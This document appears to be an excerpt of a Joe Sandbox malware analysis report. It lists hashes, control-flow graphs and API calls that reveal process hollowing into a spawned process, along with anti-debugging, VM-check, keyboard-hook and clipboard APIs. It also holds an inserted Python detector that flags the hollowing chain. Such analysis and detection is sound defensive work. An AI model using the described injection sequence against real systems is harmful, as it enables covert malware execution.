                                • Instruction ID: 332c529531de45b6776ae4e4d0cd582688edfa441309926a598de30d99228903
                                • Opcode Fuzzy Hash: 6a63a667dfaf60efe127d508f1231213a1baff22a9537cf4895109cc2fb8f785
                                • Instruction Fuzzy Hash: 5452DF74E002688FDB64DF69C944BDDBBB2BF89300F1481EAD509AB255DB349E85CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9fb38cae54ae78166822e87383ae350424588079789166f0f6aaf150d7e5b92
                                • Instruction ID: 25595a1108c0eead0590d86d1e096c962f0739ef4804b315d8bf0f125186572e
                                • Opcode Fuzzy Hash: f9fb38cae54ae78166822e87383ae350424588079789166f0f6aaf150d7e5b92
                                • Instruction Fuzzy Hash: 5CD1C378E0120ACFCB14CFA9D584ADDBBB5FF89314F189269E405AB365D730A986CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 d321cf-d321d4 1 d321d6-d33830 0->1 2 d32234-d3223b 0->2 15 d33832-d3383c 1->15 16 d33869-d33889 1->16 3 d33de0-d33e31 2->3 6 d33e33-d33e3f 3->6 7 d33e41-d33e7a WriteProcessMemory 3->7 6->7 9 d33e83-d33eab 7->9 10 d33e7c-d33e82 7->10 10->9 15->16 17 d3383e-d33840 15->17 23 d338c2-d338f1 16->23 24 d3388b-d33895 16->24 18 d33863-d33866 17->18 19 d33842-d3384c 17->19 18->16 21 d33850-d3385f 19->21 22 d3384e 19->22 21->21 26 d33861 21->26 22->21 32 d338f3-d338fd 23->32 33 d3392a-d339e0 CreateProcessA 23->33 24->23 25 d33897-d33899 24->25 27 d3389b-d338a5 25->27 28 d338bc-d338bf 25->28 26->18 30 d338a7 27->30 31 d338a9-d338b8 27->31 28->23 30->31 31->31 34 d338ba 31->34 32->33 35 d338ff-d33901 32->35 43 d339e2-d339e8 33->43 44 d339e9-d33a64 33->44 34->28 37 d33903-d3390d 35->37 38 d33924-d33927 35->38 39 d33911-d33920 37->39 40 d3390f 37->40 38->33 39->39 42 d33922 39->42 40->39 42->38 43->44 53 d33a66-d33a6a 44->53 54 d33a74-d33a78 44->54 53->54 55 d33a6c-d33a6f call d30bc0 53->55 56 d33a7a-d33a7e 54->56 57 d33a88-d33a8c 54->57 55->54 56->57 59 d33a80-d33a83 call d30bc0 56->59 60 d33a8e-d33a92 57->60 61 d33a9c-d33aa0 57->61 59->57 60->61 65 d33a94-d33a97 call d30bc0 60->65 62 d33ab2-d33ab9 61->62 63 d33aa2-d33aa8 61->63 67 d33ad0 62->67 68 d33abb-d33aca 62->68 63->62 65->61 67->3 68->67
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00D339CD
                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00D33E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: Process$CreateMemoryWrite
                                • String ID:
                                • API String ID: 575940244-0
                                • Opcode ID: bdc6e95bfeb152da5d95f10f40e21841277416b917cd31902e9570d05adf9781
                                • Instruction ID: 1fdcae0225fddfe67507a6033d527229615315416e1be076fd118aa7b818aaa9
                                • Opcode Fuzzy Hash: bdc6e95bfeb152da5d95f10f40e21841277416b917cd31902e9570d05adf9781
                                • Instruction Fuzzy Hash: B9D18971D00259DFDB10CFA9C941BEEBBF5EF48310F1485AAE848A7290D7749A85CFA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 235 d322e1-d322e2 236 d322e4 235->236 237 d322bc-d322ca 235->237 240 d322e6-d322f8 236->240 241 d32344-d324b9 236->241 238 d322b5-d322b8 237->238 239 d322cc-d322cf 237->239 242 d32243-d3224a 238->242 243 d322b9-d322bb 238->243 244 d322d1-d322d4 239->244 245 d32289-d3229a 239->245 240->241 246 d324bf 241->246 248 d3225f-d33f2c ResumeThread 242->248 243->237 247 d322d6-d322d7 244->247 244->248 249 d32274-d32287 245->249 250 d3229c 245->250 247->235 258 d33f35-d33f52 248->258 259 d33f2e-d33f34 248->259 249->245 253 d3229e-d322b3 250->253 254 d322fc-d324b9 250->254 253->238 254->246 259->258
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 197fc4b0fad993f7c198c31852a9c1f5f80bc86683daddcceb297248ee3dba36
                                • Instruction ID: a5fb1a682742847d859069e5667e8be831113add2a5795896586c273c2226ec3
                                • Opcode Fuzzy Hash: 197fc4b0fad993f7c198c31852a9c1f5f80bc86683daddcceb297248ee3dba36
                                • Instruction Fuzzy Hash: 3041B675C0D3858FC702CBA888512AABFF0AF56320F2544DBD185DB263D234590ACBB5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 262 d3378d-d33830 264 d33832-d3383c 262->264 265 d33869-d33889 262->265 264->265 266 d3383e-d33840 264->266 272 d338c2-d338f1 265->272 273 d3388b-d33895 265->273 267 d33863-d33866 266->267 268 d33842-d3384c 266->268 267->265 270 d33850-d3385f 268->270 271 d3384e 268->271 270->270 275 d33861 270->275 271->270 281 d338f3-d338fd 272->281 282 d3392a-d339e0 CreateProcessA 272->282 273->272 274 d33897-d33899 273->274 276 d3389b-d338a5 274->276 277 d338bc-d338bf 274->277 275->267 279 d338a7 276->279 280 d338a9-d338b8 276->280 277->272 279->280 280->280 283 d338ba 280->283 281->282 284 d338ff-d33901 281->284 292 d339e2-d339e8 282->292 293 d339e9-d33a64 282->293 283->277 286 d33903-d3390d 284->286 287 d33924-d33927 284->287 288 d33911-d33920 286->288 289 d3390f 286->289 287->282 288->288 291 d33922 288->291 289->288 291->287 292->293 302 d33a66-d33a6a 293->302 303 d33a74-d33a78 293->303 302->303 304 d33a6c-d33a6f call d30bc0 302->304 305 d33a7a-d33a7e 303->305 306 d33a88-d33a8c 303->306 304->303 305->306 308 d33a80-d33a83 call d30bc0 305->308 309 d33a8e-d33a92 306->309 310 d33a9c-d33aa0 306->310 308->306 309->310 314 d33a94-d33a97 call d30bc0 309->314 311 d33ab2-d33ab9 310->311 312 d33aa2-d33aa8 310->312 316 d33ad0-d33e31 311->316 317 d33abb-d33aca 311->317 312->311 314->310 321 d33e33-d33e3f 316->321 322 d33e41-d33e7a WriteProcessMemory 316->322 317->316 321->322 323 d33e83-d33eab 322->323 324 d33e7c-d33e82 322->324 324->323
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00D339CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: b8fa98d798b084c9f358c39900284a8f7d19c7fc8db64052c4949cc6b54ec2e1
                                • Instruction ID: 1ced5879b5dbb1c82d2ce914220e4869f3dc011d45f841167d8c4b1b4e04450d
                                • Opcode Fuzzy Hash: b8fa98d798b084c9f358c39900284a8f7d19c7fc8db64052c4949cc6b54ec2e1
                                • Instruction Fuzzy Hash: 5BA17D71D00659DFDF10CFA8C9417DDBBF2AF48304F1885AAE849A7290D7749A85CFA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 327 d321ec-d33830 330 d33832-d3383c 327->330 331 d33869-d33889 327->331 330->331 332 d3383e-d33840 330->332 338 d338c2-d338f1 331->338 339 d3388b-d33895 331->339 333 d33863-d33866 332->333 334 d33842-d3384c 332->334 333->331 336 d33850-d3385f 334->336 337 d3384e 334->337 336->336 341 d33861 336->341 337->336 347 d338f3-d338fd 338->347 348 d3392a-d339e0 CreateProcessA 338->348 339->338 340 d33897-d33899 339->340 342 d3389b-d338a5 340->342 343 d338bc-d338bf 340->343 341->333 345 d338a7 342->345 346 d338a9-d338b8 342->346 343->338 345->346 346->346 349 d338ba 346->349 347->348 350 d338ff-d33901 347->350 358 d339e2-d339e8 348->358 359 d339e9-d33a64 348->359 349->343 352 d33903-d3390d 350->352 353 d33924-d33927 350->353 354 d33911-d33920 352->354 355 d3390f 352->355 353->348 354->354 357 d33922 354->357 355->354 357->353 358->359 368 d33a66-d33a6a 359->368 369 d33a74-d33a78 359->369 368->369 370 d33a6c-d33a6f call d30bc0 368->370 371 d33a7a-d33a7e 369->371 372 d33a88-d33a8c 369->372 370->369 371->372 374 d33a80-d33a83 call d30bc0 371->374 375 d33a8e-d33a92 372->375 376 d33a9c-d33aa0 372->376 374->372 375->376 380 d33a94-d33a97 call d30bc0 375->380 377 d33ab2-d33ab9 376->377 378 d33aa2-d33aa8 376->378 382 d33ad0-d33e31 377->382 383 d33abb-d33aca 377->383 378->377 380->376 387 d33e33-d33e3f 382->387 388 d33e41-d33e7a WriteProcessMemory 382->388 383->382 387->388 389 d33e83-d33eab 388->389 390 d33e7c-d33e82 388->390 390->389
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00D339CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: c915f4d22f6e1691f162e2cba404ff181c6676a2caf5e1918c34a4b10a912f57
                                • Instruction ID: 32149a444f14f2794b81416b324f5e17108741815ad0f07718b795e4c795b7fe
                                • Opcode Fuzzy Hash: c915f4d22f6e1691f162e2cba404ff181c6676a2caf5e1918c34a4b10a912f57
                                • Instruction Fuzzy Hash: C0916C71D00659DFDF10CFA9C9417DDBBF2AF48300F1485AAE849A7290DB749A85CFA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 425 d33dd8-d33e31 427 d33e33-d33e3f 425->427 428 d33e41-d33e7a WriteProcessMemory 425->428 427->428 429 d33e83-d33eab 428->429 430 d33e7c-d33e82 428->430 430->429
                                APIs
                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00D33E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 713c91f9e7b0e5b72556d46e9f2a1480738940475e7cae5028be012968fccd26
                                • Instruction ID: 1736a4ce7f98598b46f21f9474c4ebd6a9adb1dbc49d791687c5a04aac3f3345
                                • Opcode Fuzzy Hash: 713c91f9e7b0e5b72556d46e9f2a1480738940475e7cae5028be012968fccd26
                                • Instruction Fuzzy Hash: 9A2115B59002499FCB10CFA9C985BDEBFF4FB48310F14852EE458A7251D374A954CB64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 433 d32234-d33e31 436 d33e33-d33e3f 433->436 437 d33e41-d33e7a WriteProcessMemory 433->437 436->437 438 d33e83-d33eab 437->438 439 d33e7c-d33e82 437->439 439->438
                                APIs
                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00D33E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: f697e3078d24b4bb77610686d64528bc6afc19a6142be6fcd533c041d009b6c6
                                • Instruction ID: 14b198bf958c007aec881468900f3d617dfa46b241414bf56423786586e7f77b
                                • Opcode Fuzzy Hash: f697e3078d24b4bb77610686d64528bc6afc19a6142be6fcd533c041d009b6c6
                                • Instruction Fuzzy Hash: C42122B5900249DFCB10CF9AC985BDEBBF4FB48310F10852AE918A7350D378AA40CBA4

                                 Control-flow Graph (node listing omitted): function starting at d32210; ReadProcessMemory is called in block d32210-d33ce4, followed by blocks d33ce6-d33cec and d33ced-d33d15.
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 00D33CD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 4ee9ab24393ee4a1b9296e83d4c2bdbe9a4a3c158433b845a462681f77344ef6
                                • Instruction ID: dcf2409e25e6eeeabf71fdf719b95e6275e2d84ff51c6f0ea835ccbd7277e861
                                • Opcode Fuzzy Hash: 4ee9ab24393ee4a1b9296e83d4c2bdbe9a4a3c158433b845a462681f77344ef6
                                • Instruction Fuzzy Hash: 2821E2B5900359DFCB10CF9AD984ADEBBF4FB48320F10842AE958A7251D375AA44CBA4

                                 Control-flow Graph (node listing omitted): function starting at d321f8; Wow64SetThreadContext is called in block d33be8-d33c14, followed by blocks d33c16-d33c1c and d33c1d-d33c45.
                                APIs
                                • Wow64SetThreadContext.KERNEL32(02767DE0,00000000), ref: 00D33C07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 9e106a14b3245c9bd983a75ea1624739dc263965e234b97359e5f13a144546b5
                                • Instruction ID: 737d6fd9184241be388fa687e314161096d5deeacd3327c54176a04e1a986b2d
                                • Opcode Fuzzy Hash: 9e106a14b3245c9bd983a75ea1624739dc263965e234b97359e5f13a144546b5
                                • Instruction Fuzzy Hash: EF2113B1D006599FCB10CF9AC545BAEFBF4AB08720F14812AE818B7341D378A944CFA5

                                 Control-flow Graph (node listing omitted): function starting at d32240, sharing the d33bdc-d33c45 body of the entry above; Wow64SetThreadContext is called in block d33be8-d33c14, followed by blocks d33c16-d33c1c and d33c1d-d33c45.
                                APIs
                                • Wow64SetThreadContext.KERNEL32(02767DE0,00000000), ref: 00D33C07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: e380d1fc1a8dacf51cf1facd38927509aafbb5e56fcbfddbc022c1e3ebf4c6ac
                                • Instruction ID: f3998ee71d534da677cc84c52d0aec64af013d04fead1a5980f838febebdbf0d
                                • Opcode Fuzzy Hash: e380d1fc1a8dacf51cf1facd38927509aafbb5e56fcbfddbc022c1e3ebf4c6ac
                                • Instruction Fuzzy Hash: A62113B1D006599BCB10CF9AC545BAEFBF4AB08720F14816AE818B7341D378A944CFA5

                                 Control-flow Graph (node listing omitted): function starting at d33b89, again ending in the d33bdc-d33c45 body; Wow64SetThreadContext is called in block d33be8-d33c14, followed by blocks d33c16-d33c1c and d33c1d-d33c45.
                                APIs
                                • Wow64SetThreadContext.KERNEL32(02767DE0,00000000), ref: 00D33C07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 614de85ea3f2e6b723799ecb35596a24d3da45926346adaab412c8ec5344ac27
                                • Instruction ID: 8a61502d465ccc147dc48388afea71e89e2c4dfa5b8996d5bbc58b927fa428ba
                                • Opcode Fuzzy Hash: 614de85ea3f2e6b723799ecb35596a24d3da45926346adaab412c8ec5344ac27
                                • Instruction Fuzzy Hash: 042115B5D006599FCB10CFAAC545BEEFBF4AB48720F14812AD418B7351D378AA44CFA1

                                 Control-flow Graph (node listing omitted): function starting at d33c51; ReadProcessMemory is called in block d33c51-d33ce4, followed by blocks d33ce6-d33cec and d33ced-d33d15.
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 00D33CD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 6739c8f24d766387be4b4d8a78cbada1127a118d05220f511afa39cecc7dd8fb
                                • Instruction ID: fdaedf104ed49552fc447baeae3cd92d67e49cc169314a4388fcc84b2a4d2438
                                • Opcode Fuzzy Hash: 6739c8f24d766387be4b4d8a78cbada1127a118d05220f511afa39cecc7dd8fb
                                • Instruction Fuzzy Hash: 1421F5B5900259DFCB10CF9AD984ADEBBF5FF48310F14842AE958A7250D3759944CFA4
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 00D33D93
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: ccaa4a949740ad090d4d51eae6208c8335f60445df3d4eb542174be79a2a4e6b
                                • Instruction ID: 9fbea4402a674a94562183a3fadb03c55bc31ed385cf6547331922a1a36d5e6b
                                • Opcode Fuzzy Hash: ccaa4a949740ad090d4d51eae6208c8335f60445df3d4eb542174be79a2a4e6b
                                • Instruction Fuzzy Hash: 701104B5900248DFCB20DF9AD944BDEBFF9EB48320F248429E559A7260C775A940CFA4
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 00D33D93
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 8b2e47cfc6856b0f5e7601751b0b557a54a9fdfe605d204095df0acd2b6d0eb5
                                • Instruction ID: 9fa705bc3f92a851c8babab0be29350ae9cb520009fc8f06e4b68cbfae6ec832
                                • Opcode Fuzzy Hash: 8b2e47cfc6856b0f5e7601751b0b557a54a9fdfe605d204095df0acd2b6d0eb5
                                • Instruction Fuzzy Hash: 181126B99002489FCB10CF99D944BDEBFF4AB48310F24841AE559A7220C375A944CFA0
                                APIs
                                • ResumeThread.KERNEL32(02767DE0), ref: 00D33F1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 89c5b7807b54ee69d49030363dd4162c3c59c477f092959842d54f1df7b6d9a4
                                • Instruction ID: e6beef153395bb26ffd44c47f34d255bc9ad14fffdf98f6657ed1b3014fde433
                                • Opcode Fuzzy Hash: 89c5b7807b54ee69d49030363dd4162c3c59c477f092959842d54f1df7b6d9a4
                                • Instruction Fuzzy Hash: 681122B5900248CFCB20DF9AC548B9EFBF8EB48320F20846AE558A7310C775A940CFA4
                                APIs
                                • ResumeThread.KERNEL32(02767DE0), ref: 00D33F1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 90af2ffb58891a13c84ffab94f4fde20199d988606c09afc1f96ebf9b9f4d266
                                • Instruction ID: 556e55488237f0f307e74bb29b385bfd93416eded1bc70e4e36d9a3da57bade1
                                • Opcode Fuzzy Hash: 90af2ffb58891a13c84ffab94f4fde20199d988606c09afc1f96ebf9b9f4d266
                                • Instruction Fuzzy Hash: 411110B5800249CFCB20DFAAC544BDEFBF4AF48320F24846AD458A7260C774A944CFA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724661446.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_cdd000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e531b32ad8a86cb3ae283ef177a7961460cd1c2a9e3043f30757fe5672b3a89f
                                • Instruction ID: 6eb0d44d13bd19292ef3a6ec9d8e09804091d771e21268e6c5704bfce0288236
                                • Opcode Fuzzy Hash: e531b32ad8a86cb3ae283ef177a7961460cd1c2a9e3043f30757fe5672b3a89f
                                • Instruction Fuzzy Hash: 6801A7314083449AE7108A1ADD84B67FFD8EF41324F19C4ABEE1A4A38AC3799D80C671
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724661446.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_cdd000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b204a8af0bdf339f7a2f3c112c7fc7fdee0154340c3962a571760ea52a43a70
                                • Instruction ID: b86f2d2a4966c4a9274d1e1414cb47fcc9bc118b2b5a2d9fc3ef8b2e2db811e6
                                • Opcode Fuzzy Hash: 3b204a8af0bdf339f7a2f3c112c7fc7fdee0154340c3962a571760ea52a43a70
                                • Instruction Fuzzy Hash: FAF062714083449EE7108E1ADC84B62FFE8EB51724F18C45BED594A28AC2799C44CA71
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 850225d9caa5bf5450e41c606c25799f734dfb65ab247183d89f010fe3ed45ad
                                • Instruction ID: 90c40d2aafc84ff8a8933caf6187d25e2941e7a71fb88c42653fd634be7f3bb8
                                • Opcode Fuzzy Hash: 850225d9caa5bf5450e41c606c25799f734dfb65ab247183d89f010fe3ed45ad
                                • Instruction Fuzzy Hash: E7219AB1D056688BEB19CF679C147DAFBF6AFC9300F14C1AAC408AA254DB740A468F51

                                Execution Graph

                                Execution Coverage:10.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:1.5%
                                Total number of Nodes:194
                                Total number of Limit Nodes:22
                                 execution_graph (node listing omitted; imported APIs reached from each root node):
                                 • c0d030: OleGetClipboard (60f8778 and several earlier wrappers), CallWindowProcW (60f7aca)
                                 • ea0848: GlobalMemoryStatusEx (617fc70, eaf3fe)
                                 • 60f1aab and 60f0108: GetModuleHandleW (60f1ab0, 60f03f4)
                                 • 60fa168: SetWindowsHookExA (60fa1ac)
                                 • 60f2b58: CreateWindowExW (60f2bc0)
                                 • ea71d0: CheckRemoteDebuggerPresent (ea7214)
                                 • 60f6ba0: DuplicateHandle
                                 • 60f85e0: OleInitialize (60f8630)
                                 • 60f7d30: KiUserCallbackDispatcher (60f7d70)
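                                 The entries above for the 00D30000 region list, per wrapper function, the remote-process calls the sample makes (VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, Wow64SetThreadContext and ResumeThread, the last two on the same thread handle 02767DE0), and the execution graph adds the anti-analysis and hooking APIs it reaches. The following Python is an added example, not part of the Joe Sandbox report, showing how a practitioner can turn such per-function API lines into a process-hollowing verdict: it parses lines in the report's own "Name.MODULE(args), ref: ADDR" shape, checks that every step of the chain is present, and correlates the thread handle passed to the context-rewrite and resume calls, since the report gives no execution order to rely on. The first five sample lines are copied from this report; the last three are constructed stand-ins for APIs named in the execution graph (their arguments are assumed), and the Nt*/SetThreadContext aliases are assumed equivalents, not something the report lists.

```python
import re

# Constructed sample input in the report's "Name.MODULE(args), ref: ADDR" shape.
# Lines 1-5 are the injection calls this report lists for the d30000 region of
# 450230549.exe; lines 6-8 are constructed stand-ins for APIs named in the
# execution graph, with assumed arguments.
SAMPLE_CALLS = """\
VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 00D33D93
ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 00D33CD7
WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00D33E6D
Wow64SetThreadContext.KERNEL32(02767DE0,00000000), ref: 00D33C07
ResumeThread.KERNEL32(02767DE0), ref: 00D33F1F
CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00EA7214
GlobalMemoryStatusEx.KERNEL32(?), ref: 0617FC70
SetWindowsHookExA.USER32(?,?,?,00000000), ref: 060FA1AC
"""

API_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Process-hollowing chain: remote allocation, remote write, thread-context rewrite,
# resume. Each step lists the API names that satisfy it; the Nt*/non-Wow64 names are
# assumed equivalents added here, the report itself only shows the KERNEL32 ones.
HOLLOWING_STEPS = (
    ("alloc", ("VirtualAllocEx", "NtAllocateVirtualMemory")),
    ("write", ("WriteProcessMemory", "NtWriteVirtualMemory")),
    ("context", ("Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread")),
    ("resume", ("ResumeThread", "NtResumeThread")),
)

# Secondary tags for APIs the execution graph shows this sample reaching.
API_TAGS = {
    "CheckRemoteDebuggerPresent": "anti-debug",
    "GlobalMemoryStatusEx": "vm-check",
    "SetWindowsHookExA": "keyboard-hook",
    "SetWindowsHookExW": "keyboard-hook",
    "OleGetClipboard": "clipboard-read",
}


def parse_api_calls(text):
    """Parse report-style API lines into dicts; lines that do not match are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # tolerate the report's bullet prefix
        m = API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def find_hollowing(calls):
    """Which chain steps are present, and do context-rewrite and resume share a thread handle?"""
    seen = {c["api"] for c in calls}
    missing = [step for step, names in HOLLOWING_STEPS if not seen.intersection(names)]
    ctx_handles = {c["args"][0] for c in calls
                   if c["api"] in HOLLOWING_STEPS[2][1] and c["args"]}
    resume_handles = {c["args"][0] for c in calls
                      if c["api"] in HOLLOWING_STEPS[3][1] and c["args"]}
    # '?' is the sandbox's marker for an unresolved argument; it must never count as a match.
    shared = sorted((ctx_handles & resume_handles) - {"?"})
    return {"complete": not missing, "missing": missing, "shared_thread_handles": shared}


def tag_calls(calls):
    """Sorted secondary tags (anti-debug, vm-check, ...) triggered by the call list."""
    return sorted({API_TAGS[c["api"]] for c in calls if c["api"] in API_TAGS})


if __name__ == "__main__":
    parsed = parse_api_calls(SAMPLE_CALLS)
    print(find_hollowing(parsed))
    print(tag_calls(parsed))
```

                                 The handle correlation is the part worth keeping: a report that shows all four APIs but with `?` in the handle positions only proves the capability exists, whereas a resolved handle such as 02767DE0 appearing in both the context-rewrite and the resume call ties the two steps to one suspended thread, which is the hollowing pattern and not, for example, an unrelated debugger helper.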

                                 Control-flow Graph (node listing omitted): function starting at 6173050 in the RegAsm 06170000 region; no imported API calls, calls subroutines 6173870 and 6173868 from 61730d5.
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-2392861976
